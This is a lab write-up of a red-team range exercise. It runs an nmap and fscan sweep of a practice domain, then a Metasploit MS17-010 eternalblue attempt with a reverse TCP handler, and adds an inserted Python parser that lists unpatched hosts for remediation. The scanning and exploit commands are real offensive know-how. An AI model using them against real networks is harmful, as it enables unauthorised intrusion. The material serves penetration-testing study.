Intranet Penetration: **ATT&CK Practical Series - Red Team Evaluation (II)** Range Notes
Preface
Postgraduate entrance exam!!!
Advanced math really torments people like me. I opened my laptop, logged in, and quickly ran a round of intranet penetration to wake my brain up; I feel like I'm about to evaporate.
gogogo
The Red Team practical series builds a set of ranges modeled on real enterprise environments, to be studied through a combination of hands-on practice, video tutorials, and blog posts.
This red team environment mainly covers Access Token abuse, WMI abuse, domain vulnerability exploitation (SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN abuse), and backdoor techniques such as golden tickets / silver tickets / SID History / MOF, from both the offensive and defensive side.
Objective: obtain and submit the contents of the flag file on the domain controller's desktop.
1. Bypass UAC
2. Obtaining NTLM hashes on Windows (theory: Windows authentication)
3. Access Token abuse (via MSSQL)
4. WMI abuse
5. Web proxies, layer-2 proxies, and special-protocol proxies (DNS, ICMP)
6. Domain information gathering
7. Domain vulnerability exploitation: SMB relay, EWS relay, PTT (PTC), MS14-068, GPP, SPN abuse
8. Domain credential collection
9. Backdoor techniques (golden ticket / silver ticket / SID History / MOF)
Environment:
DMZ segment: 172.25.0.1/24
Internal segment: 10.10.10.1/24
The topology is as follows

Start with an nmap scan
```
nmap -sT -Pn 172.25.0.1/24
```
nmap was too slow, so I went straight to fscan; the scan results are as follows
```
start infoscan
(icmp) Target 172.25.0.1 is alive
(icmp) Target 172.25.0.16 is alive
(icmp) Target 172.25.0.22 is alive
[*] Icmp alive hosts len is: 3
172.25.0.22:80 open
172.25.0.16:135 open
172.25.0.22:135 open
172.25.0.16:445 open
172.25.0.1:22 open
172.25.0.22:139 open
172.25.0.22:445 open
172.25.0.16:139 open
172.25.0.22:1433 open
[*] alive ports len is: 9
start vulscan
[*] WebTitle: http://172.25.0.22 code:200 len:0 title:None
[*] NetInfo:
[*]172.25.0.16
[->]PC
[->]10.10.10.201
[->]172.25.0.16
[+] 172.25.0.16 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.25.0.22 MS17-010 (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] NetBios: 172.25.0.22 WEB.de1ay.com Windows Server 2008 R2 Standard 7601 Service Pack 1
```
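The fscan output above is easy to eyeball for three hosts, but on a real engagement (or for the blue team reviewing the same scan) it is worth turning it into a host inventory so that unpatched, SMB-exposed machines can be listed for remediation. The parser below is an added example, not part of the original post or of fscan; the line formats it matches are taken from the output above, and the sample input is constructed to mirror it.

```python
import re
from collections import defaultdict

# Constructed sample in the fscan line formats shown above (not a real capture).
SAMPLE = """start infoscan
(icmp) Target 172.25.0.1 is alive
(icmp) Target 172.25.0.16 is alive
(icmp) Target 172.25.0.22 is alive
172.25.0.22:80 open
172.25.0.16:445 open
172.25.0.1:22 open
172.25.0.22:445 open
172.25.0.22:1433 open
[*] WebTitle: http://172.25.0.22 code:200 len:0 title:None
[+] 172.25.0.16 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.25.0.22 MS17-010 (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] NetBios: 172.25.0.22 WEB.de1ay.com Windows Server 2008 R2 Standard 7601 Service Pack 1
"""

ALIVE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
VULN = re.compile(r"^\[\+\] (\S+) (MS\d{2}-\d{3}) \((.*)\)$")
NETBIOS = re.compile(r"^\[\*\] NetBios: (\S+) (\S+) (.*)$")

def parse_fscan(text):
    """Build {ip: {ports, vulns, os, name}} from fscan's text output."""
    hosts = defaultdict(lambda: {"ports": [], "vulns": [], "os": None, "name": None})
    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE.match(line):
            _ = hosts[m.group(1)]          # register the host even with no open ports
        elif m := PORT.match(line):
            hosts[m.group(1)]["ports"].append(int(m.group(2)))
        elif m := VULN.match(line):
            h = hosts[m.group(1)]
            h["vulns"].append(m.group(2))
            h["os"] = h["os"] or m.group(3)  # OS banner comes with the finding
        elif m := NETBIOS.match(line):
            h = hosts[m.group(1)]
            h["name"] = m.group(2)
            h["os"] = h["os"] or m.group(3)
        # NetInfo / WebTitle / counter lines carry nothing we inventory here
    return dict(hosts)

def patch_first(hosts):
    """Hosts flagged MS17-010 that also expose 445: the remediation short-list."""
    return sorted(ip for ip, h in hosts.items()
                  if "MS17-010" in h["vulns"] and 445 in h["ports"])

if __name__ == "__main__":
    inv = parse_fscan(SAMPLE)
    for ip in patch_first(inv):
        print(ip, inv[ip]["name"], inv[ip]["os"])
```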
Both .16 and .22 are flagged for MS17-010, so take these two first; fire up msf.
.16 is a 32-bit host, while msf's ms17_010_eternalblue module only supports x64 targets:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.25.0.16
RHOSTS => 172.25.0.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.72.128:4444
[*] 172.25.0.16:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.25.0.16:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x86 (32-bit)
[*] 172.25.0.16:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.25.0.16:445 - The target is vulnerable.
[-] 172.25.0.16:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
```
.22 is 64-bit, so the same module works directly and yields a session on that host.